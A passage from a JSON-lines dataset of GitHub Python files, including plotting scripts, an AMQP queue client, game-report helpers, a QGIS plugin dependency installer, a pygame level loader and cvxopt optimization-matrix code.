hours:minutes\r\n if args.timedelta is not False:\r\n d0 = datetimes[0]\r\n dt0 = datetime.timedelta(days=d0.day, hours=d0.hour, minutes=d0.minute, seconds=d0.second, microseconds=d0.microsecond)\r\n datetimes = [dt - dt0 for dt in datetimes]\r\n ax.xaxis.set_major_formatter(mpl.dates.DateFormatter('%H:%M:%S')) # ignore dates and just plot versus elapsed time\r\n if p == 0: # don't need to print for each column\r\n if not args.quiet:\r\n print('time elapsed: {}'.format(datetimes[-1])) # can improve this later\r\n datetimes = mpl.dates.date2num(datetimes)\r\n line = ax.plot_date(datetimes, col, label=fname, **lineprops)\r\n for l in ax.get_xticklabels():\r\n l.set_rotation(45)\r\n else:\r\n line = ax.plot(xdata, col, label=fname, **lineprops)\r\n \r\n # Ends up labeling based on last file in list\r\n ax.set_ylabel(label)\r\n if args.traces:\r\n ax.set_xlabel(labels[plotvs[1]])\r\n else:\r\n ax.set_xlabel(labels[plotvs[0]])\r\n if args.logx:\r\n ax.set_xscale('log', nonposx='clip')\r\n if args.logy:\r\n ax.set_yscale('log', nonposy='clip')\r\n if args.arrows:\r\n ind = col.shape[0]//2\r\n ax.annotate('', xy=(xdata[ind+args.arrows], col[ind+args.arrows]),\r\n xytext=(xdata[ind], col[ind]),\r\n arrowprops=dict(arrowstyle='->', ec=line[-1].get_color(), linewidth=4), size=24)\r\n if args.dashes and np.mean(np.diff(xdata)) < 0:\r\n line[-1].set_ls('--')\r\n ax.autoscale(enable=True, axis='x', tight=True)\r\n if args.xlim:\r\n ax.set_xlim(args.xlim)\r\n if args.ylims:\r\n if len(args.ylims) > 1:\r\n ylim = args.ylims[p]\r\n else:\r\n ylim = args.ylims[0]\r\n ax.set_ylim(ylim)\r\n\r\n if colorplot_mode:\r\n # use data from all files for 2D interpolation\r\n raw_data = np.concatenate([d for d in data if d is not None]) # skip empty entries (from emtpy files)\r\n raw_data = np.ma.masked_invalid(raw_data)\r\n\r\n if args.interpolate and len(args.interpolate) > 1:\r\n # set interpolation limits\r\n interpX, interpY = args.interpolate # ((X1, X2, Nx), (Y1, Y2, Ny))\r\n if len(interpX) < 3: # use data limits for interpolation limits\r\n X1, X2, Nx = np.nanmin(raw_data[:, plotvs[0]]), np.nanmax(raw_data[:, plotvs[0]]), int(interpX[0])\r\n else: # use user-provided limits\r\n X1, X2, Nx = interpX\r\n Nx = int(Nx)\r\n if len(interpY) < 3: # use data limits for interpolation limits\r\n Y1, Y2, Ny = np.nanmin(raw_data[:, plotvs[1]]), np.nanmax(raw_data[:, plotvs[1]]), int(interpY[0])\r\n else: # use user-provided limits\r\n Y1, Y2, Ny = interpY\r\n Ny = int(Ny)\r\n gridY, gridX = np.mgrid[Y1:Y2:Ny*1j, X1:X2:Nx*1j]\r\n\r\n # apply mask color, if supplied (only works for colormaps, not scatter)\r\n if args.masknegative and args.masknegative is not True:\r\n args.cmap = mcm.get_cmap(args.cmap)\r\n args.cmap.set_bad(color=args.masknegative)\r\n\r\n # interpolate and plot\r\n cplot_props = dict(cmap=args.cmap, origin='lower', aspect='auto', interpolation='none')\r\n for p, (ax, usecol, clabel) in enumerate(zip(it.cycle(axes), usecols, labels[usecols])):\r\n interp_data = sci.griddata(raw_data[:, plotvs], raw_data[:, usecol], (gridX, gridY))\r\n if args.logz:\r\n cplot_props['norm'] = LogNorm()\r\n elif args.centeredz:\r\n cplot_props['norm'] = CenteredNorm()\r\n else:\r\n cplot_props['norm'] = Normalize()\r\n if args.crange:\r\n # cplot_props.update(vmin=crange[p][0], vmax=crange[p][1])\r\n cplot_props['norm'].vmin = crange[p][0]\r\n cplot_props['norm'].vmax = crange[p][1]\r\n if args.csigma:\r\n cmean, cstd = np.nanmean(interp_data), np.nanstd(interp_data)\r\n cplot_props.update(vmin=cmean-args.csigma*cstd, vmax=cmean+args.csigma*cstd)\r\n print('column \\'{:s}\\':\\tmean = {:.5g}\\tstddev = {:.5g}\\tcrange = {:.5g} to {:.5g}'.format(clabel, cmean, cstd, cplot_props['vmin'], cplot_props['vmax']))\r\n cplot = ax.imshow(interp_data, extent=(X1, X2, Y1, Y2), **cplot_props)\r\n cbar = fig.colorbar(cplot, ax=ax)\r\n cbar.set_label(clabel)\r\n else:\r\n cplot_props = dict(s=colorplot_marker_size, edgecolors='none')\r\n if args.masknegative: # this is supposed to enable mask color in scatter plot mode\r\n cplot_props['plotnonfinite'] = True\r\n if args.logz:\r\n cplot_props['norm'] = LogNorm()\r\n elif args.centeredz:\r\n cplot_props['norm'] = CenteredNorm()\r\n else:\r\n cplot_props['norm'] = Normalize()\r\n if args.square:\r\n cplot_props['marker'] = 's'\r\n for p, (ax, usecol, clabel) in enumerate(zip(it.cycle(axes), usecols, labels[usecols])):\r\n if args.csigma:\r\n cmean, cstd = np.nanmean(raw_data[:, usecol]), np.nanstd(raw_data[:, usecol])\r\n vmin, vmax = cmean-args.csigma*cstd, cmean+args.csigma*cstd\r\n print('column \\'{:s}\\':\\tmean = {:.5g}\\tstddev = {:.5g}\\tcrange = {:.5g} to {:.5g}'.format(clabel, cmean, cstd, vmin, vmax))\r\n else:\r\n vmin, vmax = crange[p][0], crange[p][1]\r\n if args.crange:\r\n cplot_props['norm'].vmin = vmin\r\n cplot_props['norm'].vmax = vmax\r\n cplot = ax.scatter(raw_data[:, plotvs[0]], raw_data[:, plotvs[1]], c=raw_data[:, usecol], cmap=args.cmap, **cplot_props)\r\n cbar = fig.colorbar(cplot, ax=ax)\r\n cbar.set_label(clabel)\r\n #ax.autoscale(enable=True, axis='both', tight=True)\r\n print('{} files'.format(len(files)))\r\n\r\n fig.tight_layout()\r\n if lineplot_mode and not args.nolegend:\r\n leg = ax.legend(loc=0)\r\n #leg = fig.legend(loc='lower center')\r\n try:\r\n leg.set_draggable(True)\r\n except:\r\n leg.draggable()\r\n plt.show()\r\n\r\n# call first instance of main()\r\nmain()\r\n","repo_name":"sergiodlb/speedyplot","sub_path":"speedyplot.py","file_name":"speedyplot.py","file_ext":"py","file_size_in_byte":66152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25066405131","text":"# -*- encoding: utf-8 -*-\n'''\nCreated on 2016年8月29日\n\n@author: huawei\n'''\nfrom kombu import Connection, Exchange, Queue\n\n\nclass KombuClient(object):\n def __init__(self,url=\"amqp://172.16.4.134\"):\n self.url= url\n self.conn = Connection(self.url)\n \n \n def addQueue(self,queueName,exchangeName=None,routingKey=None,priority=1):\n self._connect()\n exchangeName = exchangeName if exchangeName else queueName\n routingKey = routingKey if routingKey else queueName\n \n science_news = Queue(queueName,exchange=Exchange(exchangeName),routing_key=routingKey,max_priority=priority)\n chan = self.conn.channel()\n try:\n bound_science_news = science_news(chan)\n bound_science_news.declare()\n finally: \n chan.close()\n self._release()\n \n def deleteQueue(self,queueName,exchangeName):\n self._connect()\n science_news = Queue(queueName)\n chan = self.conn.channel()\n try:\n bound_science_news = science_news(chan)\n bound_science_news.delete()\n finally: \n chan.close()\n self._release()\n \n def deleteExchage(self,exchangeName):\n self._connect()\n chan = self.conn.channel()\n bound_exchange = Exchange(exchangeName)\n try:\n bound_exchange=bound_exchange(chan)\n bound_exchange.delete()\n finally: \n chan.close()\n self._release()\n \n def sendMessage(self,exchangeName,message,routingKey=None):\n self._connect()\n chan = self.conn.channel()\n bound_exchange = Exchange(exchangeName)\n routingKey = routingKey if routingKey else exchangeName\n try:\n bound_exchange=bound_exchange(chan)\n message = bound_exchange.Message(message)\n bound_exchange.publish(message,routingKey)\n finally: \n chan.close()\n self._release()\n \n \n def clearQueue(self,queueName):\n self._connect()\n science_news = Queue(queueName)\n chan = self.conn.channel()\n try:\n bound_science_news = science_news(chan)\n bound_science_news.purge()\n finally: \n chan.close()\n self._release()\n \n def _connect(self):\n self.conn.connect()\n \n def _release(self):\n self.conn.release()","repo_name":"alonelaval/cabbage-celery","sub_path":"src/cabbage/common/Kombu/kombu_amqp_client.py","file_name":"kombu_amqp_client.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"31"} +{"seq_id":"14782645502","text":"import random\n\nnames = ['John', 'Corey', 'Adam', 'Steve', 'Rick', 'Thomas']\nmajors = ['Math', 'Engineering', 'CompSci', 'Arts', 'Business']\n\ndef students_list(num_students):\n #li = []\n #for i in range(num_students):\n # j = names[random.randint(0,5)]\n # k = majors[random.randint(0,4)]\n # t = (i,j,k)\n\n # li.append(t)\n li = [(i,names[random.randint(0,5)],majors[random.randint(0,4)]) for i in range(num_students)]\n return li\n\n\ndef students_generator(num_students):\n li = ((i,names[random.randint(0,5)],majors[random.randint(0,4)]) for i in range(num_students))\n return li\n\n#people = students_list(1000000)\npeople = students_generator(1000000)\n\nprint(next(people))\nprint(next(people))\nprint(next(people))\nprint(next(people))\nprint(next(people))","repo_name":"EskilWennevold/Python","sub_path":"Generator/Majors.py","file_name":"Majors.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39636061141","text":"# Report functions\n\n\ndef open_file(file_name):\n \"\"\"Opens the file and returns content in form of a list\"\"\"\n try:\n with open(file_name, \"r\") as f:\n content = f.readlines()\n content = [game for game in content if game]\n content = [game.split(\"\\t\") for game in content]\n return content\n except FileNotFoundError as err:\n raise err\n\n\ndef count_games(file_name):\n \"\"\"Returns number of lines in a file (games)\"\"\"\n content = open_file(file_name)\n return len(content)\n\n\ndef decide(file_name, year):\n \"\"\"Returns True if there is a game from given year in a file. Otherwise returns False\"\"\"\n if type(year) != int:\n raise ValueError(\"Not a valid year\")\n content = open_file(file_name)\n for game in content:\n if str(year) in game:\n return True\n return False\n\n\ndef get_latest(file_name):\n \"\"\"Returns title of the latest game in the file\"\"\"\n content = open_file(file_name)\n game_name = content[0][0]\n game_year = int(content[0][2])\n latest = [game_name, game_year]\n for game in range(1, len(content)):\n game_name = content[game][0]\n game_year = int(content[game][2])\n if latest[1] < game_year:\n latest[0] = game_name\n latest[1] = game_year\n return latest[0]\n\n\ndef count_by_genre(file_name, genre):\n \"\"\"Returns the number of games from given genre from the file\"\"\"\n if type(genre) != str:\n raise TypeError(\"Invalid genre\")\n content = open_file(file_name)\n genre_index = 3\n count = 0\n for game in content:\n if genre.lower() == game[genre_index].lower():\n count += 1\n return count\n\n\ndef get_line_number_by_title(file_name, title):\n \"\"\"Returns the number of line of a given game(title) from the file\"\"\"\n if type(title) != str:\n raise TypeError(\"Invalid title\")\n content = open_file(file_name)\n title_index = 0\n titles = [game[title_index] for game in content]\n try:\n line = titles.index(title) + 1\n except ValueError as err:\n raise err\n return line\n\n\ndef quick_sort(lst):\n \"\"\"Sorting algorithm\"\"\"\n if not lst:\n return []\n return (quick_sort([x for x in lst[1:] if x < lst[0]])\n + [lst[0]] +\n quick_sort([x for x in lst[1:] if x >= lst[0]]))\n\n\ndef sort_abc(file_name):\n \"\"\"Sort and return title list\"\"\"\n content = open_file(file_name)\n title_index = 0\n arr = [game[title_index] for game in content]\n arr = quick_sort(arr)\n return arr\n\n\ndef get_genres(file_name):\n \"\"\"Return sorted genre list without duplicates\"\"\"\n content = open_file(file_name)\n genre_index = 3\n genres = list(set([game[genre_index] for game in content]))\n genres = quick_sort(genres)\n return genres\n\n\ndef when_was_top_sold_fps(file_name):\n \"\"\"Return year of a top selling fps game\"\"\"\n content = open_file(file_name)\n copies_sold_index = 1\n year_index = 2\n genre_index = 3\n best_selling_fps = []\n for game in content:\n if game[genre_index] == \"First-person shooter\":\n if len(best_selling_fps) == 0:\n best_selling_fps = [float(game[copies_sold_index]), game[year_index]]\n elif best_selling_fps[0] < float(game[copies_sold_index]):\n best_selling_fps = [float(game[copies_sold_index]), game[year_index]]\n if len(best_selling_fps) == 0:\n raise ValueError(\"No fps game in the file\")\n return int(best_selling_fps[1])\n\n","repo_name":"AlekEl/Python-Game-statistics-reports","sub_path":"reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16455080368","text":"import os\nimport sys\nimport importlib\nfrom qgis.PyQt.QtWidgets import QMessageBox\n\n\ndef check(required_packages):\n # Check if required packages are installed\n missing_packages = []\n for package in required_packages:\n try:\n importlib.import_module(package)\n if package == 'pdfgpt':\n import pdfgpt\n if pdfgpt.__version__ != '0.2.2':\n missing_packages.append('pdfgpt==0.2.2')\n except ImportError:\n if package == 'SpeechRecognition':\n try:\n import speech_recognition as sr\n continue\n except:\n pass\n missing_packages.append(package)\n\n try:\n import openai\n update_version = False\n if openai.version.VERSION == '0.27.0':\n update_version = True\n except:\n update_version = False\n\n if missing_packages:\n message = \"The following Python packages are required to use the plugin QChatGPT:\\n\\n\"\n message += \"\\n\".join(missing_packages)\n message += \"\\n\\nWould you like to install them now? After installation please restart QGIS.\"\n\n reply = QMessageBox.question(None, 'Missing Dependencies', message,\n QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n\n if reply == QMessageBox.No:\n return\n\n for package in missing_packages:\n update = False\n try:\n os.system('\"' + os.path.join(sys.prefix, 'scripts', 'pip') + f'\" install {package}')\n update = True\n finally:\n if not update:\n try:\n importlib.import_module(package)\n import subprocess\n subprocess.check_call(['python3', '-m', 'pip', 'install', package])\n except:\n importlib.import_module(package)\n\n # Upgrade openai\n if update_version:\n message = \"The package openai needs an update for the plugin QChatGPT:\\n\\n\"\n message += \"\\n\".join(missing_packages)\n message += \"\\n\\nWould you like to update now?\"\n\n reply = QMessageBox.question(None, 'Missing Dependencies', message,\n QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n\n if reply == QMessageBox.No:\n return\n\n update = False\n try:\n os.system('\"' + os.path.join(sys.prefix, 'scripts', 'pip') + f'\" install --upgrade openai')\n update = True\n finally:\n if not update:\n try:\n import subprocess\n subprocess.check_call(['python3', '-m', 'pip', 'install', f'\" --upgrade openai'])\n except:\n pass\n","repo_name":"KIOS-Research/QChatGPT","sub_path":"install_packages/check_dependencies.py","file_name":"check_dependencies.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"31"} +{"seq_id":"74997059926","text":"user_text = 'utifulBea si terbet ntha y/ugl icitExpl is erbett than icit/impl eSimpl si rbette hant ex/compl ' \\\n 'xComple is better anth cated/compli tFla si etterb ntha nested/ arseSp is tterbe than nse/de ' \\\n 'tyReadabili unts/co cialSpe cases (taren cialspe ghenou to break '\nuser_text = user_text.split(' ')\nprint(user_text)\nnew_text = []\nlen_letter = 0\ntemp_letter = []\ntext = ''\nk = 0\n\nfor letter in user_text:\n if not k % 2 and len(letter) == 2:\n temp_letter = letter[-1:] + letter[:-1]\n new_text.append(temp_letter)\n continue\n\n # temp_letter = letter[-k-3:] + letter[:-k-3]\n temp_letter = letter[(len(letter) + -1 * k) % len(letter):] + letter[:(len(letter) + -1 * k) % len(letter)]\n\n if str(temp_letter).endswith('/'):\n new_text.append(temp_letter[:-1] + '\\n')\n k += 1\n continue\n\n new_text.append(temp_letter)\n\n temp_letter = []\ntext = ' '.join(new_text)\n\nprint(text)\n","repo_name":"ProgmanZ/Modul-18.6-Tasks-HW-","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14075901804","text":"import pygame\nfrom pygame import *\nfrom blocks import *\nfrom monsters import *\nfrom settings import *\n#import random\n\nclass Level:\n\n def __init__(self, way):\n self.levelFile = open(\"%s/{}\".format(way) % ICON_DIR, 'r')\n self.playerX = 0\n self.playerY = 0\n self.level = []\n self.platforms = []\n self.entities = pygame.sprite.Group()\n self.monsters = pygame.sprite.Group()\n \n a = int(self.levelFile.readline().replace(\"\\n\", \"\"))\n for i in range(a):\n self.line = self.levelFile.readline()\n self.level.append(self.line[0:len(self.line) - 1])\n \n b = int(self.levelFile.readline().replace(\"\\n\",''))\n for i in range(b):\n self.line = self.levelFile.readline().replace(\"\\n\",'')\n if self.line == \"Player\":\n self.playerX = int(self.levelFile.readline().replace(\"\\n\",\"\"))\n self.playerY = int(self.levelFile.readline().replace(\"\\n\",\"\"))\n if self.line == \"Monster\":\n mn = Monster(int(self.levelFile.readline().replace(\"\\n\",\"\")),\n int(self.levelFile.readline().replace(\"\\n\",\"\")),\n int(self.levelFile.readline().replace(\"\\n\",\"\")),\n int(self.levelFile.readline().replace(\"\\n\",\"\")),\n int(self.levelFile.readline().replace(\"\\n\",\"\")),\n int(self.levelFile.readline().replace(\"\\n\",\"\")))\n self.entities.add(mn)\n self.platforms.append(mn)\n self.monsters.add(mn) \n \n #if self.line[0] != \"\": # если строка не пустая\n # self.commands = self.line.split() # разбиваем ее на отдельные команды\n #if len(self.commands) > 1: # если количество команд > 1, то ищем эти команды\n # if self.commands[0] == \"player\": # если первая команда - player\n # self.playerX= int(self.commands[1]) # то записываем координаты героя\n # self.playerY = int(self.commands[2])\n # if self.commands[0] == \"monster\": # если первая команда monster, то создаем монстра\n # mn = Monster(int(self.commands[1]),int(self.commands[2]),int(self.commands[3]),int(self.commands[4]),int(self.commands[5]),int(self.commands[6]))\n # self.entities.add(mn)\n # self.platforms.append(mn)\n # self.monsters.add(mn)\n \n self.convertLvl()\n \n def convertLvl(self):\n\n x=y=0 # координаты\n for row in self.level: # вся строка\n for col in row: # каждый символ\n\n if col == \"-\":\n pf = Platform(x,y)\n self.entities.add(pf)\n self.platforms.append(pf)\n\n if col == \"*\":\n bd = BlockDie(x,y)\n self.entities.add(bd)\n self.platforms.append(bd)\n\n if col == \"W\":\n end = End(x,y)\n self.entities.add(end)\n self.platforms.append(end)\n\n if col == \"H\":\n m = Half(x,y)\n self.entities.add(m)\n self.platforms.append(m)\n \n if col == \"M\":\n m = Magnit(x,y)\n self.entities.add(m)\n self.platforms.append(m)\n \n if col == \"C\":\n c = Coin(x,y)\n self.entities.add(c)\n self.platforms.append(c)\n \n # if col == \"M\":\n # m = Movable(x,y)\n # self.entities.add(m)\n # self.platforms.append(m)\n \n \n #слишком сильно кушает фпс\n # if col == \" \":\n # r = random.randint(0,2)\n # if r == 0:\n # b = Platform(x,y, \"block/0.png\")\n # elif r ==1:\n # b = Platform(x,y, \"block/1.png\")\n # else:\n # b = Platform(x,y, \"block/2.png\")\n # self.entities.add(b)\n\n x += PLATFORM_WIDTH #блоки платформы ставятся на ширине блоков\n y += PLATFORM_HEIGHT #то же самое и с высотой\n x = 0 #на каждой новой строчке начинаем с нуля\n\n def getLvl(self):\n return self.level\n\n def getPlayerX(self):\n return self.playerX\n\n def getPlayerY(self):\n return self.playerY\n\n def getEntities(self):\n return self.entities\n\n def getPlatforms(self):\n return self.platforms\n \n def getMonsters(self):\n return self.monsters\n","repo_name":"KoSTyA-bel/-","sub_path":"readlevel.py","file_name":"readlevel.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38986356202","text":"import pandas as pd\nimport matplotlib.pyplot as plt\ndf = pd.read_csv(\"https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data\",\n names = [\"Sepal Length\", \"Sepal Width\", \"Petal Length\", \"Petal Width\", \"Class\"])\ncolors = {\"Iris-setosa\": \"red\", \"Iris-versicolor\": \"blue\", \"Iris-virginica\": \"green\"}\nprint(df)\n\nplt.scatter(df[\"Sepal Length\"], df[\"Sepal Width\"], c=df[\"Class\"].map(colors))\nplt.xlabel(\"Sepal Length\")\nplt.ylabel(\"Sepal Width\")\nplt.show()\nplt.scatter(df[\"Petal Length\"], df[\"Petal Width\"], c=df[\"Class\"].map(colors))\nplt.xlabel(\"Petal Length\")\nplt.ylabel(\"Petal Width\")\nplt.show()\nplt.scatter(df[\"Sepal Length\"], df[\"Petal Width\"], c=df[\"Class\"].map(colors))\nplt.xlabel(\"Sepal Length\")\nplt.ylabel(\"Petal Width\")\nplt.show()\nplt.scatter(df[\"Petal Length\"], df[\"Sepal Width\"], c=df[\"Class\"].map(colors))\nplt.xlabel(\"Petal Length\")\nplt.ylabel(\"Sepal Width\")\nplt.show()\n\n","repo_name":"KrzycheG/ProgramowaniePython","sub_path":"Zadanie3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35011711902","text":"from scipy.special import lambertw\nfrom cvxopt import solvers,matrix,spmatrix,sparse,spdiag,div,mul,exp\n\nimport numpy as np\nimport gc\nfrom time import ctime\nfrom os.path import join\n\n\ndef compute_cp_matrices(n_rows,n_cols,T,lam_t,lam_s,lh_trend=True,\n ifCompute_Gh=False,wrapAround=True):\n '''\n This computes the matrices used in cp optimization.\n '''\n \n grid_size=n_rows*n_cols\n if grid_size>200:\n print(ctime()+'...computing optimization matrices...')\n\n if wrapAround:#no. of spatial constraints\n r_s=T*(2*n_rows*n_cols-n_rows);\n else:\n r_s=T*(2*n_rows*n_cols-n_rows-n_cols);\n r_t=n_rows*n_cols*(T-2);#no. of temporal constraints\n \n #===form matrix D===\n #---spatial penalty---\n I_s=[];J_s=[];x_s=[];\n\n for c in range(n_cols):\n for r in range(n_rows):\n \n #---determine the neighbors of the current point---\n if ((r<(n_rows-1)) & (c<(n_cols-1))):\n r_n=[r+1,r];c_n=[c,c+1]\n elif ((r==(n_rows-1)) & (c<(n_cols-1))):\n r_n=[r];c_n=[c+1]\n elif (c==(n_cols-1)):\n if wrapAround:\n r_n=[r+1,r];c_n=[c,0]\n else:\n r_n=[r+1];c_n=[c]\n if (r==(n_rows-1)):\n continue\n \n idx_n=np.ravel_multi_index((r_n,c_n),\n dims=(n_rows,n_cols),order='F')\n\n idx=np.ravel_multi_index((r,c),\n dims=(n_rows,n_cols),order='F') \n #---determine the neighbors of the current point---\n \n #---add indices corresponding to current point and its neighbors---\n for i in idx_n:\n I_s.append(len(I_s)*T+np.tile(np.arange(T),(1,2)))\n J_s.append(np.hstack([np.arange(idx*T,(idx+1)*T),\n np.arange(i*T,(i+1)*T)]))\n x_s.append(np.hstack([np.ones(T),-1*np.ones(T)]))\n\n #---add indices corresponding to current point and its neighbors--- \n I_s=np.hstack(I_s).flatten();J_s=np.hstack(J_s).flatten();\n x_s=np.hstack(x_s).flatten();\n #---spatial penalty---\n\n #---temporal penalty--- \n m=T-2;p=grid_size\n ind=np.arange(m)\n I0=np.tile(ind,(1,3))\n J0=np.concatenate((ind,ind+1,ind+2)).reshape((3*ind.size))\n x_t=np.tile(np.concatenate((np.ones((1,m)),\n -2*np.ones((1,m)),\n np.ones((1,m))),axis=1),p).flatten()\n \n #-long-horizon penalty-\n if lh_trend:\n n_year=T/52\n I_lh0=[];J_lh0=[];x_lh0=[]\n for i in range(n_year-2):\n I_lh0.append([i]*3*52)\n J_lh0.append(np.arange(i*52,i*52+3*52))\n x_lh0.append([1.0]*52+[-2.0]*52+[1.0]*52)\n I_lh0=np.concatenate(I_lh0);J_lh0=np.concatenate(J_lh0);\n x_lh=np.tile(np.concatenate(x_lh0),(p,))\n I_lh=[I_lh0];J_lh=[J_lh0];\n #-long-horizon penalty-\n \n I_t=[I0];J_t=[J0]; \n for pp in range(p-1):\n I_t.append(I0+(pp+1)*m)\n J_t.append(J0+(pp+1)*T)\n if lh_trend:\n I_lh.append(I_lh0+(n_year-2)*(pp+1))\n J_lh.append(J_lh0+T*(pp+1))\n I_t=np.hstack(I_t).flatten();J_t=np.hstack(J_t).flatten();\n #---temporal penalty---\n \n if lh_trend:\n r_lh=(n_year-2)*p#this is used in computing h below\n I_lh=np.hstack(I_lh);J_lh=np.hstack(J_lh);\n I=np.hstack([I_t,I_s+r_t,I_lh+r_s+r_t]);\n J=np.hstack([J_t,J_s,J_lh]);\n x=np.hstack([x_t,x_s,x_lh]);\n D=spmatrix(x,I,J,size=(r_s+r_t+r_lh,T*grid_size)) \n else: \n I=np.hstack([I_t,I_s+r_t]);J=np.hstack([J_t,J_s]);\n x=np.hstack([x_t,x_s]);\n D=spmatrix(x,I,J,size=(r_s+r_t,T*grid_size))\n r_lh=0\n #===form matrix D===\n \n #===form matrix G,h===\n if ifCompute_Gh:\n r_D=D.size[0];c_D=D.size[1]\n if grid_size>200:\n print('\\t'+ctime()+'...computing G...') \n G=sparse([-D.T,spdiag([1.0]*r_D),spdiag([-1.0]*r_D)])\n h=np.atleast_2d(np.hstack(([1.0]*c_D,\n [lam_t]*r_t,[lam_s]*r_s,[lam_t]*r_lh,\n [lam_t]*r_t,[lam_s]*r_s,[lam_t]*r_lh))).\\\n transpose()\n h=matrix(h)\n return D,G,h\n else:\n return D\n #===form matrix G,h===\n\ndef computeLoss(Z,Y,D,lam_t,lam_s,T,n_rows,n_cols,lh_trend):\n '''\n This function evaluates the objective function at a given solution\n Z.\n '''\n \n n_t=n_rows*n_cols*(T-2);#no. of temporal constraints\n n_lh=0\n if lh_trend:\n n_year=T/52\n n_lh=(n_year-2)*n_rows*n_cols\n n_s=D.size[0]-n_lh-n_t#no. of spatial constraints\n lam_vec=np.array(n_t*[lam_t]+n_s*[lam_s]+n_lh*[lam_t]).reshape((1,-1))\n \n f1=np.sum(np.array(Z+mul(Y**2,exp(-Z))))\n f2=float(lam_vec.dot( np.abs(np.array(D*Z)) ))\n \n return f1+f2\n\ndef ComputeLocToGlobVarTransform(n_rows,n_cols,T,n_r,n_c):\n '''\n This function computes a matrix :math:`A` which specifies the relationship\n between the local variables :math:`x_i` and the global variable :math:`z` \n for a problem in which the data on a grid are devided into several \n sub-grids. Specifically we have: :math:`z=Ax`, where \n :math:`x=(x_1,...,x_K)^T` and each :math:`x_i` is the collection of the\n local variables corresponding to the sub-grid :math:`i`.\n \n Parameters\n ---------\n n_rows : integer\n number of rows in the oroginal grid.\n n_cols : integer\n number of columns in the oroginal grid.\n n_r : integer\n number of rows in each sub-grid. \n n_c : integer\n number of columns in each sub-grid.\n \n Returns\n -------\n A : sparse\n The transformation matrix.\n '''\n \n boundary_rows=np.arange(0,n_rows,n_r-1)[1:-1]\n boundary_cols=np.arange(0,n_cols,n_c-1)[1:-1]\n n_boundary_rows=boundary_rows.size;n_boundary_cols=boundary_cols.size\n n_x_blk=n_r*n_c*T#no. of x variables in each block\n I_vec=[];J_vec=[]\n\n #===determine block===\n def determineBlock(r,c):\n '''\n This function determines the block :math:`x_i` to which\n a given entity of z belongs. It also returns what row and col\n in that block, the entity is.\n '''\n \n n1=np.sum((r-boundary_rows)>0)\n n2=np.sum((c-boundary_cols)>0)\n blk=n2*(n_boundary_rows+1)+n1#block number\n r_b=r-n1*(n_r-1);c_b=c-n2*(n_c-1)\n return (blk,r_b,c_b)\n #===determine block=== \n \n #===corner points===\n r1=np.tile(boundary_rows,(n_boundary_cols,1)).flatten('F')\n c1=np.tile(boundary_cols,(n_boundary_rows,1)).flatten()\n idx1=np.ravel_multi_index((r1,c1),(n_rows,n_cols),order='F')\n \n #these are the conrner points. So they are always the\n #(n_r,n_c) entery of one block, and the (0,n_c) entry of the block below,\n #(n_r,0) entery of block ont the right,\n #and the (0,0) entry of the block diagonal to the first block.\n for i,idx in enumerate(idx1):\n I=np.tile(np.arange(idx*T,(idx+1)*T),4)\n \n blk1,r_b1,c_b1=determineBlock(r1[i],c1[i])\n idx_in_blk1=np.ravel_multi_index((r_b1,c_b1),(n_r,n_c),order='F') \n J1=np.arange(blk1*n_x_blk+idx_in_blk1*T,\n blk1*n_x_blk+(idx_in_blk1+1)*T)\n \n blk2,r_b2,c_b2=(blk1+1,0,n_c-1)\n idx_in_blk2=np.ravel_multi_index((r_b2,c_b2),(n_r,n_c),order='F')\n J2=np.arange(blk2*n_x_blk+idx_in_blk2*T,\n blk2*n_x_blk+(idx_in_blk2+1)*T)\n\n blk3,r_b3,c_b3=(blk1+n_boundary_rows+1,n_r-1,0)\n idx_in_blk3=np.ravel_multi_index((r_b3,c_b3),(n_r,n_c),order='F')\n J3=np.arange(blk3*n_x_blk+idx_in_blk3*T,\n blk3*n_x_blk+(idx_in_blk3+1)*T)\n\n blk4,r_b4,c_b4=(blk1+n_boundary_rows+2,0,0)\n idx_in_blk4=np.ravel_multi_index((r_b4,c_b4),(n_r,n_c),order='F')\n J4=np.arange(blk4*n_x_blk+idx_in_blk4*T,\n blk4*n_x_blk+(idx_in_blk4+1)*T)\n \n I_vec.append(I);J_vec.append(np.hstack((J1,J2,J3,J4)))\n #===corner points===\n \n #===row boundary points===\n r2=np.tile(boundary_rows,(n_cols-n_boundary_cols,1)).flatten('F')\n c2=np.tile(np.delete(np.arange(n_cols),boundary_cols),\n (n_boundary_rows,1)).flatten()\n idx2=np.ravel_multi_index((r2,c2),(n_rows,n_cols),order='F')\n \n #these are the points on the row boundaries. So they are always the\n #(n_r,c) entery of one block and the (0,c) entry of the block below.\n for i,idx in enumerate(idx2):\n blk1,r_b1,c_b1=determineBlock(r2[i],c2[i])\n idx_in_blk1=np.ravel_multi_index((r_b1,c_b1),(n_r,n_c),order='F')\n I=np.tile(np.arange(idx*T,(idx+1)*T),2)\n J1=np.arange(blk1*n_x_blk+idx_in_blk1*T,\n blk1*n_x_blk+(idx_in_blk1+1)*T)\n blk2,r_b2,c_b2=(blk1+1,0,c_b1)\n idx_in_blk2=np.ravel_multi_index((r_b2,c_b2),(n_r,n_c),order='F')\n J2=np.arange(blk2*n_x_blk+idx_in_blk2*T,\n blk2*n_x_blk+(idx_in_blk2+1)*T)\n \n I_vec.append(I);J_vec.append(np.hstack((J1,J2))) \n #===row boundary points===\n \n #===column boundary points=== \n 